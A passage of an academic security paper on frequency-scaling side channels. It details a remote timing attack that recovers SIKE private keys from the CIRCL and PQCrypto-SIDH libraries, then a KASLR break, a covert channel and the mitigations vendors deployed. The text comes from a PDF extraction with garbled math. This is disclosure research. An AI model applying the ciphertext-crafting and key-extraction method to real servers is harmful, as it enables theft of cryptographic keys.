
   • If, however, mi = mi−1, or if the attacker was wrong about

   the i least significant bits of m when constructing the chal-

   lenge ciphertext, then the (i+1)st round generates a non-0

   value. Heuristically, the remainder of the computation pro-

   ceeds without producing an anomalous 0 value except with

   negligible probability.

   This observation is new, and it represents a core contribution

   of our work. Because SIKE is built on somewhat abstruse

   math, we defer the details of how to construct points P and Q

   that trigger an anomalous 0 value, and why a 0 value causes

   the decapsulation algorithm to get stuck, to Section 5.3.

   The values operated on by SIKE decapsulation are large

   (a single element of the field underlying SIKE-751 takes

   188 bytes to express) and the operations themselves are com-

   plex: the inner loop of the Montgomery ladder comprises

   thousands of lines of hand-optimized assembly. Nevertheless,

   in Section 5.1, we show that SIKE decapsulation behaves

   like the much simpler, synthetic senders of Section 4. When

   mi 6= mi−1 and the decapsulation algorithm gets stuck, repeat-

   edly producing and operating on 0 values, the processor con-

   sumes less power and runs at a higher steady-state frequency

   (and therefore decapsulation takes a shorter wall time).

   Taken together, our findings mean that the server’s secret

   key can be recovered by an adaptive chosen-ciphertext attack,

   using execution time as a side channel. Having extracted the

   first i bits of m, the adversary repeatedly queries the server

   with ciphertexts that should cause decapsulation to get stuck

   in the (i + 1)st round. If the server responds faster than a

   baseline (established through profiling), the adversary con-

   cludes that bit mi

   is the opposite of bit mi−1; otherwise bit

   mi

   is the same. The attacker then proceeds to the next bit. In

   Section 5.2, we show that the timing signal is so robust that

   key extraction is possible across a network. We demonstrate

   full recovery of the (378-bit) private key from the SIKE-751

   implementations in two popular, production-ready crypto-

   graphic libraries: Cloudflare’s Interoperable Reusable Crypto-

   graphic Library (CIRCL) [28], written in Go, and Microsoft’s

   PQCrypto-SIDH [66], written in C. Both of libraries are hard-

   ened against previously known software side channels and

   meant to run in constant time. Our attack is practical; an un-

   optimized version recovers the full key from a CIRCL server

   in 36 hours and from a PQCrypto-SIDH server in 89 hours.

   5.1 P-State and SIKE implementation

   We start by verifying that a correct key-bit guess in our chosen-

   ciphertext attack—one that causes the Montgomery ladder

   and the remainder of SIKE decapsulation to repeatedly pro-

   duce 0 values—causes the processor to execute at a higher

   frequency than an incorrect key-bit guess does. Our local ex-

   periment uses 10 randomly generated SIKE-751 server keys.

   For each key m = (m`−1,...,m0)2, we target 4 out of the 378

   bit positions. We choose the target bit positions uniformly at

   random, to validate that the frequency difference is observable

   even for bits accessed late in the Montgomery ladder loop.

   Suppose we target bit i in a secret key m. Provided that

   mi 6= mi−1, we can craft a challenge ciphertext that will trigger

   an anomalous 0 value in the Montgomery ladder iteration that

   accesses bit i. However, if mi = mi−1, then there is no chal-

   lenge ciphertext that can trigger the anomalous 0 value. To

   make sure we are measuring the effect of anomalous 0 values,

   and not some other unknown effect, we set up our experiment

   as follows. For each key m and each target bit index i, we

   create a variant key m

   0

   that agrees with m at every bit posi-

   tion except index i, where it has the opposite bit value.6

   In

   other words, m

   0 =

   3.8 3.9 4.0

   Frequency (GHz)

   0.0

   0.2

   0.4

   0.6

   0.8

   Probability

   mi = mi 1 mi mi 1

   30 35 40

   Power consumption (W)

   0.0

   0.1

   0.2

   Probability density

   mi = mi 1 mi mi 1

   (a) CIRCL data

   3.6 3.7

   Frequency (GHz)

   0.00

   0.25

   0.50

   0.75

   1.00

   Probability

   mi = mi 1 mi mi 1

   40 45

   Power consumption (W)

   0.0

   0.1

   0.2

   0.3

   Probability density

   mi = mi 1 mi mi 1

   (b) PQCrypto-SIDH data

   Figure 9: Distribution of the power consumption and the fre-

   quency when the challenge ciphertext introduces an anoma-

   lous 0 (mi 6= mi−1) or not (mi = mi−1), using the setups from

   Section 4 on our i7-9700 CPU. The results are over 10 ran-

   domly generated keys, where, for each key, we target 4 out of

   the 378 bit positions. For each key and each bit, we launch the

   server with 300 goroutines (CIRCL) or pthreads (PQCrypto-

   SIDH), each of which handles a single decapsulation request.

   have elapsed. As in Section 4, we run each experiment in

   two setups. In the first setup, we use the default system con-

   figuration, and monitor the steady-state CPU frequency. In

   the second setup, we disable SpeedStep/HWP (this way, our

   CPU stays at the base frequency during the experiment) and

   monitor (core domain) power consumption. We sample both

   the CPU frequency and the power consumption every 1 ms.

   We group the measured data points according to whether

   we expect the challenge ciphertext to induce an anomalous 0

   or not. For each key m and target bit position i, exactly one of

   m and m

   0

   contributes to the anomalous-0 grouping.

   The results, shown in Figures 9a and 9b, confirm that

   the steady-state frequency is higher and the power consump-

   tion is lower when an anomalous 0 is triggered (mi 6= mi−1)

   than when it is not (mi = mi−1), for both the CIRCL and

   the PQCrypto-SIDH decapsulation servers. As noted above,

   both these libraries are hardened against previously known

   software side channels and meant to run in constant time.

   The signal we obtain from PQCrypto-SIDH is fainter than

   the one we obtain from CIRCL, because PQCrypto-SIDH

   uses a different strategy for Montgomery reduction that causes

   the value 0 to be represented in memory sometimes as 0 and

   sometimes as a prime number of size 751 bits.

   5.2 SIKE Key Remote Recovery

   We now show that the secret-dependent power consumption

   and frequency differences observed in Section 5.1 translate to

   a remotely observable secret-dependent timing difference.

   We configure a SIKE target server with a randomly gen-

   erated static 378-bit key for SIKE-7517

   , revealed for com-

   parison only after the attack completes. Our server accepts a

   client decapsulation request over HTTP (Go) or TCP (C) and

   spawns a goroutine (Go) or pthread (C) to handle the request.

   The thread reads in the ciphertext and performs the decapsula-

   tion computation, after which it sends a message back to the

   client indicating the establishment of a shared secret but no

   other information. The target server and the attacker are both

   connected to the same network, and we measure an average

   round-trip time of 688 µs between the two machines.

   The attacker simultaneously sends n requests with a chal-

   lenge ciphertext meant to trigger an anomalous 0 and mea-

   sures the time t it takes to receive responses for all n re-

   quests. When an anomalous 0 is triggered, power decreases,

   frequency increases, SIKE decapsulation executes faster, and t

   should be smaller. Based on the observed t and the previously

   recovered secret key bits, the attacker can infer the value of

   the target bit, then repeat the attack for the next bit.

   For the attack to be successful, we must overcome a number

   of practical difficulties. First, we must set a value for n, the

   number of requests, that allows us to observe a clear timing

   signal when we trigger the anomalous 0s. We experimentally

   find an n big enough that the frequency increase is remotely

   observable, but not so big that we induce thrashing.

   Second, we must set a time cutoff to distinguish when

   anomalous 0s are triggered and when they are not. To this

   end, we collect the decapsulation times when querying the

   server with a random ciphertext, and use these times to set

   a cutoff for queries not triggering anomalous 0s. We then

   query the server with the challenge ciphertexts for the first

   few bits of the key until we see a speedup compared to the

   random ciphertext, and use these times to set a cutoff for

   queries triggering anomalous 0s.

   Third, we must detect and recover from mistakes caused

   by random variations in the server’s decapsulation time. Re-

   call that a challenge ciphertext constructed using a wrong

   value for the i least significant bits of m will never trigger

   anomalous 0s regardless of the relationship of mi and mi−1.

   Measuring no timing reduction in many consecutive rounds

   is evidence either that many consecutive key bits all have

   the same value (unlikely since key bits are independent and

   uniformly distributed), or that the value we are using for the

   least significant bits of the key is wrong (cf. Appendix A.4).

   In our experiments, we backtrack when experiments for 40

   consecutive bit positions show no timing reduction.

   Finally, there is a chance that a challenge ciphertext con-

   structed as in Section 5.3.2 will accidentally trigger an anoma-

   lous 0 later in the decapsulation process even if it does not at

   the target bit index i of the Montgomery ladder. This will hap-

   7The SIKE standard and the implementations we examined place the

   long-term keypair in the 3-torsion and the ephemeral key used for
   forming

   a ciphertext in the 2-torsion, so this is the case we studied. A
   variant of our

   attack applies also if the roles are swapped.

   650 660 670

   Time (ms)

   0.00

   0.05

   0.10

   0.15

   Probability density

   mi = mi 1 mi mi 1

   (a) CIRCL histogram

   1550 1560 1570 1580

   Time (ms)

   0.00

   0.05

   0.10

   Probability density

   mi = mi 1 mi mi 1

   (b) PQCrypto-SIDH histogram

   Figure 10: Distribution of the timings measured by the at-

   tacker during the remote key extraction attack, with the server

   running on an i7-9700 CPU. The attacker makes 300 (CIRCL)

   and 1000 (PQCrypto-SIDH) connections (all with the same

   challenge ciphertext, constructed as per Section 5.3.2) and

   measures the time until the last connection completes. We

   group the execution time (filtered) of each key bit extraction

   based on whether it should have triggered an anomalous 0 in

   the Montgomery ladder (i.e., whether mi = 1−mi−1 or not).

   pen with exponentially small probability for most bit indices,

   but larger probability for the last few bit indices. We defer

   a detailed explanation to Appendix A.3. It may be possible

   to avoid triggering this misbehavior with a different way of

   constructing the challenge key. We instead sidestep it by stop-

   ping our interaction with the server after extracting all but the

   last 14 bits; we recover these last bits by brute-force search.

   Attack Setup We run the SIKE target server on our i7-9700

   CPU using the default system configuration. In the attack

   on CIRCL, the server is an HTTP server written using Go’s

   net.http library, which handles each request in a goroutine.

   In the attack on PQCrypto-SIDH, the server is a TCP server

   written in C, which handles each request in a pthread.

   We configure the attacker to send n = 300 concurrent re-

   quests in the CIRCL case, and n = 1000 requests in the

   PQCrypto-SIDH case. In both cases, concurrent requests are

   sent all with the same challenge ciphertext (constructed as

   described in Section 5.3.2), and the attacker measures the

   time until the last connection completes. We experimentally

   determine the expected timings when the CPU frequency in-

   creases because of anomalous 0s and when it does not: for

   CIRCL, at most 660.2 ms and at least 662.5 ms, respectively;

   for PQCrypto-SIDH at most 1556 ms and at least 1558 ms,

   respectively. We repeat the measurement 400 times, exclude

   outliers (CIRCL: below 650 ms or above 675 ms; PQCrypto-

   SIDH: below 1500 ms or above 1580 ms), compute the me-

   dian of the remaining values, and compare to the cutoffs. If

   the result is inconclusive for a bit, we repeat the attack on that

   bit. We use our side channel to extract the key up to bit 364

   and recover the last 14 bits by brute force search.

   Results In Figure 10a and Figure 10b, we show the timing

   distribution of the 300-connection runs (CIRCL) and 1000-

   connection runs (PQCrypto-SIDH) respectively, grouped ac-

   0 3 6 9 12 15 18

   Secret key bit index

   660

   661

   662

   663

   Time (ms)

   mi mi 1

   mi = mi 1

   (a) CIRCL first 20 bits

   345 348 351 354 357 360 363

   Secret key bit index

   660

   661

   662

   663

   Time (ms)

   mi mi 1

   mi = mi 1

   (b) CIRCL last 20 bits

   Figure 11: Median times used to extract the first 20 bits (0

   to 19) and the last 20 bits (345 to 364) of the key for the

   same attack against CIRCL SIKE-751 as in Figure 10a. The

   timings depend on whether the challenge ciphertext triggered

   an anomalous 0 (mi 6= mi−1) or not (mi = mi−1).

   0 3 6 9 12 15 18

   Secret key bit index

   1554

   1556

   1558

   1560

   Time (ms)

   mi mi 1

   mi = mi 1

   (a) PQCrypto-SIDH first 20 bits

   345 348 351 354 357 360 363

   Secret key bit index

   1556

   1558

   Time (ms)

   mi mi 1

   mi = mi 1

   (b) PQCrypto-SIDH last 20 bits

   Figure 12: Median times used to extract the first 20 bits (0 to

   19) and the last 20 bits (345 to 364) of the key for the same

   attack against PQCrypto-SIDH SIKE-751 as in Figure 10b.

   The timings depend on whether the challenge ciphertext trig-

   gered an anomalous 0 (mi 6= mi−1) or not (mi = mi−1).

   cording to whether the challenge ciphertext of that run trig-

   gered an anomalous 0 (mi 6= mi−1) or not (mi = mi−1).

   For the first and the last 20 bit positions of the key that we

   extract by interacting with the server (bits 0–19 and 345–364,

   respectively), we plot, in Figure 11 (CIRCL) and Figure 12

   (PQCrypto-SIDH), the median time among the 400 measure-

   ments for that bit and whether the run triggered an anoma-

   lous 0 (mi 6= mi−1) or not (mi = mi−1) at that bit position. The

   signal is strong for both the top bits and the bottom bits.

   Both attacks successfully recovered the full secret key. The

   attack on CIRCL completed in 36 hours, while the attack on

   PQCrypto-SIDH completed in 89 hours. We expect that the at-

   tack running time could be reduced with careful optimization.

   Unlike our attack on CIRCL, our attack on PQCrypto-SIDH

   made 1 mistake and needed to backtrack; see Appendix A.4

   for our error correction strategy.

   5.3 Anomalous 0s in SIKE Decapsulation

   We now explain how an attacker can construct SIKE cipher-

   texts that trigger an anomalous 0 in the (i + 1)st iteration

   of the Montgomery ladder when mi 6= mi−1, and why that

   anomalous 0, once generated, causes the remainder of the

   decapsulation algorithm to also produce 0s repeatedly.

   We briefly recall some relevant mathematical background

   in Appendix A.2. We recommend that readers review a longer

   introduction to the math behind elliptic curves, isogenies, and

   SIKE; Costello’s tutorial expositions of elliptic curves [18]

   and isogenies [19] are especially good choices.

   The first subroutine in the SIKE decapsulation algorithm

   recovers (the Montgomery coefficient A of) the curve E

   0

   0

   on

   which the points P, Q, and Q−P, included in the ciphertext

   provided by the attacker, lie. This subroutine is fast and inde-

   pendent of the secret key; we do not consider it further.

   The second subroutine uses the Montgomery three-point

   ladder to compute P + [m]Q on the curve E

   0

   0

   recovered by

   the first subroutine. This is the subroutine in which a correct

   key-bit guess (mi 6= mi−1) can trigger the generation of an

   anomalous 0 value. We explain how in Section 5.3.2.

   The third subroutine evaluates the isogeny corresponding

   to the point P + [m]Q, computing (the Montgomery coeffi-

   cient of) the curve E

   0

   e3

   that is the image of E

   0

   0

   under that

   isogeny. The fourth subroutine computes the j-invariant of the

   curve E

   0

   e3

   ; this j-invariant is the shared SIDH secret. In Sec-

   tion 5.3.3 and Appendix A.3, we explain how an anomalous 0

   value output by the Montgomery ladder causes the isogeny

   evaluation (third subroutine) and the j-invariant computation

   (fourth subroutine) to produce additional anomalous 0s.

   The final step in SIKE decapsulation is a Fujisaki–Okamoto

   consistency check [31, 44] that checks that the ciphertext was

   properly generated. If the check fails, the recipient generates

   a random session key instead of the one prescribed by the

   (invalid) ciphertext. The Fujisaki–Okamoto check immunizes

   SIKE against attacks, such as that due to Galbraith et al. [32],

   that require partial information about the j-invariant computed

   when decapsulating (invalid) ciphertexts.

   We do not claim to invalidate SIKE’s proof of security.

   None of the ciphertexts we construct in our attack passes the

   Fujisaki–Okamoto check. Nevertheless, our attack recovers

   the server’s secret key, because we obtain the information

   we need from the running time of the subroutines performed

   before the Fujisaki–Okamoto check.

   While our paper was under embargo (cf. Section 1), our

   chosen-ciphertext attack triggering anomalous 0s in SIKE

   decapsulation, described in this subsection, was independently

   rediscovered by De Feo et al. [25].

   5.3.1 Affine and Projective X-Coordinate Point Repre-

   sentations on Montgomery Curves

   A Montgomery curve is defined by the equation EA,B : By2 =

   x

   3 + Ax2 + x, with parameters A,B ∈ Fp

   2 such that B(A

   2 −

   4) 6= 0. Montgomery curves have properties that make them

   suitable for efficient, side-channel resistant implementations.

   In particular, many operations needed in cryptography can

   be computed using just the x-coordinate of a point (ignoring

   the y-coordinate) and just the curve parameter A (ignoring

   the curve parameter B). The point with x- and y-coordinate

   Algorithm 1: Three point ladder ( [52], Appendix A)

   1 function Ladder3pt

   Input: m = (m`−1,...,m0)2 ∈ Z, (xP, xQ, xQ−P),

   and (A : 1)

   Output:

   Consider the algorithm xADD that, given points U,V, and W

   in projective x-coordinate form where W = U −V, computes

   the point U +V in projective x-coordinate form, as:

   X ← ZW

   -

   (XU −ZU )(XV +ZV ) + (XU +ZU )(XV −ZV )

   2

   Z ← XW

   -

   (XU −ZU )(XV +ZV )−(XU +ZU )(XV −ZV )

   2

   .

   When U −V is any point except O or T, xADD(U,V,U −V)

   correctly returns U +V. However, when U −V is O or T,

   xADD(U,V,U −V) misbehaves and returns the invalid projec-

   tive representation (0 : 0) instead of U +V [21].9

   Worse, xADD(U,V,W) will also return (0 : 0) if called with

   any of U, V, or W equal to (0 : 0), regardless of the value

   of the other two inputs.10 Repeated applications of xADD can

   thus get stuck at (0 : 0). We use exactly this fact for our attack.

   Suppose that we can arrange that, at the beginning of iter-

   ation k in Ladder3pt, (X2 : Z2) ∼ T, i.e., that X2 = 0 and Z2

   is nonzero. There are 2 cases to consider:

   • if mk = 1, then T will be passed into the third argument of

   xDBLADD, triggering the misbehavior in xADD and causing

   (X1 : Z1) to be set to (0 : 0).

   • otherwise, if mk = 0, then T will instead be passed into

   the second argument of xDBLADD. This will not trigger

   the misbehavior in xADD and not produce (0 : 0) as an

   output. The point (X2 : Z2), which was equal to T, will be

   overwritten with whatever xADD returns.

   In the first case, xADD will get stuck; the second element

   of the tuple returned by xDBLADD will be (0 : 0) in every

   subsequent iteration of Ladder3pt’s loop, and Ladder3pt

   will eventually return (0 : 0). In the second case, it is likely

   that 0 values will not recur during the ladder computation.

   It remains to show how the attacker can arrange for(X2 : Z2)

   to equal T at loop iteration k. Let 𝜇i = (mi−1,...,m0)2 rep-

   resent the least significant i bits of m. Algorithm Ladder3pt

   maintains the invariant that, at the beginning of iteration i of

   the loop, the points (X0 : Z0), (X1 : Z1), and (X2 : Z2) satisfy

   (X0 : Z0) ∼ [2

   i

   ]Q

   (X1 : Z1) ∼ P+[𝜇i

   ]Q

   (X2 : Z2) ∼ (X0 : Z0)−(X1 : Z1) .

   Suppose that that the attacker, proceeding bit-by-bit, has ex-

   tracted 𝜇k. The attacker picks an arbitrary curve and sets Q to

   be an arbitrary point on the curve.

   If mk−1 = 0, the attacker sets

   P ←

   -

   2

   k − 𝜇k

   Q−T . (1)

   9

   If U −V = O then U = V and therefore (XU : ZU ) ∼ (XV : ZV ). If

   U −V = T then U = 𝜏T (V) where 𝜏T is the translation-by-T map; by a

   property of Montgomery curves, it follows that (XU : ZU ) ∼ (ZV : XV ).

   10In this case it does not matter— indeed, does not make sense to ask—

   whether W = U −V.

   Then, at iteration k of the Ladder3pt loop, we will have (X2 :

   Z2) ∼ T. If mk = 1, T will be passed as the third argument

   to xDBLADD, triggering the misbehavior as described above.

   If mk−1 = 1, the attacker instead sets

   P ← T −

   -

   𝜇k

   Q . (2)

   Then, at iteration k of the Ladder3pt loop, we will have (X1 :

   Z1) ∼ T. If mk = 0, T will be passed as the third argument

   to xDBLADD, triggering the misbehavior.

   To summarize, if mk 6= mk−1, the crafted input ciphertext

   will trigger the anomalous 0 misbehavior.

   When generated according to the SIKE specification, P

   and Q are always linearly independent points of order 3

   e3 and

   never produce T or O during the execution of Ladder3pt.

   When generated according to our algorithm above but with

   an incorrect key-bit guess, we expect that T or O will be

   produced only with negligible probability.11 This conjecture

   is supported by our experiments.

   5.3.3 Anomalous 0s in Isogeny Evaluation and j-

   Invariant Calculation

   The next task in SIKE decapsulation, isogeny evaluation, is

   carried out by algorithm 3_e_iso, which takes as input the

   point P + [m]Q (in projective x-coordinate form) as output

   by Ladder3pt, expecting it to be a point of exact order 3

   e3 .

   In Appendix A.3, we show that, when invoked on the invalid

   input (0 : 0), 3_e_iso and its subroutines repeatedly operate

   on and produce 0 values. Isogeny evaluation in 3_e_iso thus

   acts as an amplifier for the signal produced by the ladder

   evaluation in Ladder3pt, making it possible to observe even

   an anomalous 0 produced in a late Ladder3pt loop iteration.

   After isogeny evaluation, the next task in SIKE decapsula-

   tion is j-invariant calculation, using algorithm jInvariant.

   When 3_e_iso returns (0 : 0), jInvariant is invoked with

   input (0 : 0), every intermediate value it computes is 0, and

   its return value (the SIDH shared secret) is 0.12

   5.4 Mitigations

   We now describe the mitigation that Cloudflare and Microsoft

   deployed after we disclosed our attack on SIKE.

   The mitigation, which was originally proposed by De Feo

   et al. [25], consists of validating that the ciphertext (public

   key) consists of a pair of linearly independent points of the

   correct order 3

   e3 . This check is performed before running the

   three-point ladder and prevents attack ciphertexts from being

   further processed, thus hindering the attack. When running

   decapsulation on a single thread on our i7-9700 CPU, we

   11This fact allows us not only to distinguish a correct from an
   incorrect bit

   guess for bit mk but also to detect and recover from mistakes in
   determining

   the earlier bits 𝜇k; see Appendix A.4.

   12Note that this output depends on the result of inverting 0 in Fp

   2 in step 15

   of jInvariant. The Montgomery inversion algorithms in the implementa-

   tions we examined have 1/0 = 0 (see Savas and Koç [83]).

   found that the mitigation adds a performance overhead of 5%

   for CIRCL and of 11% for PQCrypto-SIDH.

   6 Timer-free Attacks

   We now show that not only can we use the frequency side

   channel to turn power attacks into remote timing attacks (as

   we saw in Section 5), but we can also use it to mount timing

   attacks without a timer. To this end, we use the frequency side

   channel to mount a KASLR break and a covert channel.

   KASLR Break Like prior work [12,13,37,43,45,51,63,64],

   the goal of the (unprivileged) attacker is to de-randomize the

   kernel base address. Knowledge of the kernel base address is

   useful to mount memory corruption exploits.

   In Linux, the kernel text is placed at a 2 MB boundary in the

   0xffffffff80000000 – 0xffffffffc0000000 range [13].

   Hence, the kernel can be placed at one of 512 possible offsets.

   Prior work has shown that, on Intel and AMD processors,

   there is a timing and power consumption difference when ex-

   ecuting prefetch instructions on a memory address depending

   on whether that address is mapped or not [43, 63]. This dif-

   ference can be used to infer the location of the kernel within

   its predefined region. We show that this power consumption

   difference manifests also as a CPU frequency difference.

   To this end, we build a sender process similar to the ones

   of Figure 3, but using only prefetcht0 instructions. While

   the sender runs, a separate thread measures the current CPU

   frequency using the unprivileged scaling_cur_freq inter-

   face from the cpufreq driver. We ran the sender with all

   the 512 possible kernel base addresses, for 10 different ran-

   domizations (i.e., repeating across 10 reboots) on our Intel

   i7-9700 CPU. In all 10 cases, we were able to identify the

   base address successfully (as verified by checking the privi-

   leged /proc/kallsyms interface). We measured an average

   steady-state CPU frequency of 4.04 GHz when repeatedly

   prefetching mapped addresses, and 4.24 GHz when repeat-

   edly prefetching unmapped addresses. The runtime of our un-

   optimized, proof-of-concept implementation is of 2 minutes.

   This runtime is larger than state-of-the-art KASLR breaks,

   but could be reduced with additional engineering effort.

   Covert Channel Like prior work, our covert channel uses

   a sender and a receiver. To transmit a 0, the sender executes

   a loop of or instructions with high HD and HW in their data

   flow. This loop increases the power consumption and results

   in lower CPU frequency values. To transmit a 1, the sender

   executes a loop of shlx instructions with low HD and HW in

   their data flow. This loop decreases the power consumption

   and results in higher CPU frequency values. The receiver

   measures the current CPU frequency using the unprivileged

   scaling_cur_freq interface from the cpufreq driver.

   We evaluated our covert channel by transmitting 1 kB of

   random data on our i7-9700 CPU. Our unoptimized, proof-

   of-concept implementation achieved a bandwidth of 30 bps

   with an error rate of 0.03% (average across 10 runs). This

   bandwidth is similar to the one of prior covert channels relying

   on software-based power measurement interfaces [63, 64].

   7 Discussion

   Affected CPUs We successfully reproduced our attack on

   Intel CPUs from the 8th to the 11th generation of the Core

   microarchitecture (reported in Table 1). We also tested two

   desktop CPUs from older generations, namely the i7-6700K

   (Skylake) and i7-7700K (Kaby Lake), and we found that both

   models only support Turbo frequencies on single core work-

   loads: as soon as more than 1 core is active, the P-state is

   capped at the base frequency. In our experiments, we were

   not able to force the frequency into steady state (i.e., below the

   max turbo frequency) with single-core workloads, and were

   therefore unable to reproduce our attack on these models.

   Besides CPUs from the (client-class) Core microarchitec-

   ture, our attack should also work on Intel Xeon CPUs (server-

   class) since they also use similar P-state management tech-

   niques. Additionally, other CPU vendors implement similar

   DVFS mechanisms and are likely vulnerable. For example,

   we verified that the AMD Ryzen processors are also vulnera-

   ble to our attack, featuring a similar HW/HD leakage model

   and enabling the same SIKE vulnerability that we described

   in Section 5. We leave reverse engineering the specific char-

   acteristics of the AMD leakage model to future work.

   Mitigating Leakage via the Frequency Channel Our at-

   tack is enabled by data-dependent frequency adjustments at

   steady state. As we showed, the affected CPUs enter this state

   when certain power and thermal limits are hit during a work-

   load’s execution. Thus, one approach to mitigate the attack is

   to reduce the likelihood that the CPU hits these limits. One

   workload-independent way to do so is to either disable Turbo

   Boost, or to disable SpeedStep and HWP from the BIOS. We

   verified that, with otherwise standard system configurations,

   both methods cause the frequency to stay fixed at the base

   frequency during workload execution and never enter steady

   state, preventing leakage via the frequency side channel. How-

   ever, this approach significantly reduces system performance.

   Moreover, this approach may not be sufficient on system con-

   figurations with custom power limits. Indeed, in concurrent

   work, Liu et al. show that a privileged adversary can extract

   AES-NI keys using the frequency side channel after reducing

   the power limits to fractions of their default values [65].

   Mitigating Leakage in Ciphers Another mitigation strat-

   egy consists of removing secret-dependent leakage in crypto-

   graphic software. For example, SIKE’s mitigation discussed

   in Section 5.4 hinders our attack by preventing attack cipher-

   texts from triggering secret-dependent computations on 0s.

   For cryptographic software in general, mitigating the power

   leakage itself would naturally close the frequency channel.

   True decoupling would require that all operands have no sta-

   tistical correlation with secrets, which is only feasible with

   techniques like fully homomorphic encryption. A more realis-

   tic approach takes advantage of the fact that it is not the power

   usage of each operand that is leaked, but an average of the

   power usage across all operands in a time period. This goal

   may be achieved using masking/blinding techniques. Prior

   works have introduced protocol-specific masking techniques

   for ciphers such as AES [8,38,82,86] and blinding techniques

   for elliptic-curve cryptography [54]. Automatic masking tech-

   niques have also been proposed either in software [7, 17, 27]

   or leveraging additional hardware support [26, 33, 41, 42, 79].

   However, masked/blinded implementations may still leak in

   practice via power side channels [4, 5, 34, 69, 81, 84, 85].

   Future defenses could also examine the potential of fus-

   ing unrelated loops, vectorizing operations, or other meth-

   ods of interleaving different computations. These approaches

   could be done by combining multiple, normally sequential,

   computations in the program or by introducing an additional

   complementary kernel. Effective blinding will require that

   the combined computation’s power trace is not related to any

   secret computation. For example, if we can construct a bit-

   inverted version of a cryptographic kernel, we can interleave

   the real kernel and the blinding kernel. Our model of HW and

   HD provides a starting point for future work on blinding.

   8 Conclusion

   We discovered that in modern Intel (and AMD) x86 CPUs,

   DVFS-induced frequency variations depend on the current

   power consumption, and hence on the data being processed.

   We showed, for the first time, that the HD and HW of data

   individually and non-uniformly contribute to power consump-

   tion and frequency on modern x86 CPUs. We described a

   novel chosen-ciphertext attack against SIKE, which uses this

   knowledge to leak full cryptographic keys via remote timing.

   The security implications of our findings are significant.

   Not only do they expand the attack surface of power side-

   channel attacks by removing the need for power measurement

   interfaces, but they also show that, even when implemented

   as constant time, cryptographic code can still leak via remote

   timing analysis. The takeaway is that current cryptographic

   engineering practices for how to write constant-time code are

   no longer sufficient to guarantee constant time execution of

   software on modern, variable-frequency processors.

   Acknowledgments

   This work was funded in part through NSF grants 1942888

   and 1954521, and gifts from Google, Mozilla, and Qualcomm.

   Wang was partly supported by a Packard Fellowship (via

   Brent Waters). We thank our shepherd Michael Schwarz and

   the anonymous reviewers for their valuable feedback.

   Availability

   We have open sourced the code of all the experiments of this

   paper at https://github.com/FPSG-UIUC/hertzbleed.

   References

   [1] Andreas Abel and Jan Reineke. uops.info: Characterizing latency,

   throughput, and port usage of instructions on Intel microarchitectures.

   In ASPLOS, 2019.

   [2] Andreas Abel and Jan Reineke. uiCA: Accurate throughput prediction

   of basic blocks on recent Intel microarchitectures. In ICS, 2022.

   [3] Ross Anderson. Security Engineering: A Guide to Building Dependable

   Distributed Systems, 3rd Edition. John Wiley & Sons, 2020.

   [4] Josep Balasch, Benedikt Gierlichs, Vincent Grosso, Oscar Reparaz,
   and

   François-Xavier Standaert. On the cost of lazy engineering for masked

   software implementations. In CARDIS, 2014.

   [5] Sven Bauer. Attacking exponent blinding in RSA without CRT. In

   COSADE, 2012.

   [6] Daniel J. Bernstein and Tanja Lange. Montgomery curves and the

   Montgomery ladder. In Topics in Computational Number Theory

   Inspired by Peter L. Montgomery. Cambridge University Press, 2017.

   [7] Alex Biryukov, Daniel Dinu, Yann Le Corre, and Aleksei Udovenko.

   Optimal first-order boolean masking for embedded iot devices. In

   CARDIS, 2017.

   [8] Johannes Blömer, Jorge Guajardo, and Volker Krummel. Provably

   secure masking of AES. In SAC, 2004.

   [9] Eric Brier, Christophe Clavier, and Francis Olivier. Correlation
   power

   analysis with a leakage model. In CHES, 2004.

   [10] Len Brown. powercap: restrict energy meter to root access. https:

   //git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin

   ux.git/commit/?id=949dd0104c496fa7c14991a23c03c62e4463

   7e71, 2020. Accessed on Jun 7, 2022.

   [11] Ileana Buhan, Lejla Batina, Yuval Yarom, and Patrick Schaumont.
   SoK:

   Design tools for side-channel-aware implementions. In ASIACCS,

   2022.

   [12] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz

   Lipp, Marina Minkin, Daniel Moghimi, Frank Piessens, Michael

   Schwarz, Berk Sunar, Jo Van Bulck, and Yuval Yarom. Fallout: Leaking

   data on Meltdown-resistant CPUs. In CCS, 2019.

   [13] Claudio Canella, Michael Schwarz, Martin Haubenwallner, Martin

   Schwarzl, and Daniel Gruss. KASLR: Break it, fix it, repeat. In

   ASIACCS, 2020.

   [14] Suresh Chari, Charanjit Jutla, Josyula R Rao, and Pankaj Rohatgi.
   A

   cautionary note regarding evaluation of AES candidates on smart-cards.

   In AES2, 1999.

   [15] Yimin Chen, Xiaocong Jin, Jingchao Sun, Rui Zhang, and Yanchao

   Zhang. POWERFUL: Mobile app fingerprinting via power analysis.

   In INFOCOM, 2017.

   [16] Jean-Sébastien Coron. Resistance against differential power
   analysis

   for elliptic curve cryptosystems. In CHES, 1999.

   [17] Jean-Sébastien Coron, Johann Großschädl, Mehdi Tibouchi, and

   Praveen Kumar Vadnala. Conversion from arithmetic to boolean mask-

   ing with logarithmic complexity. In FSE, 2015.

   [18] Craig Costello. Pairings for beginners. Online: https://www.craigc

   ostello.com.au/s/PairingsForBeginners.pdf, 2012.

   [19] Craig Costello. Supersingular isogeny key exchange for beginners.
   In

   SAC, 2019.

   [20] Craig Costello. The case for SIKE: A decade of the supersingular

   isogeny problem. Cryptology ePrint Archive, Report 2021/543, 2021.

   [21] Craig Costello and Benjamin Smith. Montgomery curves and their

   arithmetic - the case of large characteristic fields. J. Cryptogr.
   Eng.,

   8(3), 2018.

   [22] Ian Cutress. Why Intel processors draw more power than expected:

   TDP and Turbo explained. https://www.anandtech.com/show/1

   3544/why-intel-processors-draw-more-power-than-expec

   ted-tdp-turbo, 2018. Accessed on Jun 7, 2022.

   [23] Luca De Feo. Mathematics of isogeny based cryptography. Preprint,

   arXiv:1711.04062 [cs.CR], 2017.

   [24] Luca De Feo. Exploring isogeny graphs. Habilitation thesis,
   Université

   de Versailles Saint-Quentin-en-Yvelines, 2018.

   [25] Luca De Feo, Nadia El Mrabet, Aymeric Genêt, Novak Kaluderovi ¯
   c,´

   Natacha Linard de Guertechin, Simon Pontié, and Élise Tasso. SIKE

   channels. Cryptology ePrint Archive, Report 2022/054, 2022.

   [26] Elke De Mulder, Samatha Gummalla, and Michael Hutter. Protecting

   RISC-V against side-channel attacks. In DAC. IEEE, 2019.

   [27] Hassan Eldib and Chao Wang. Synthesis of masking countermeasures

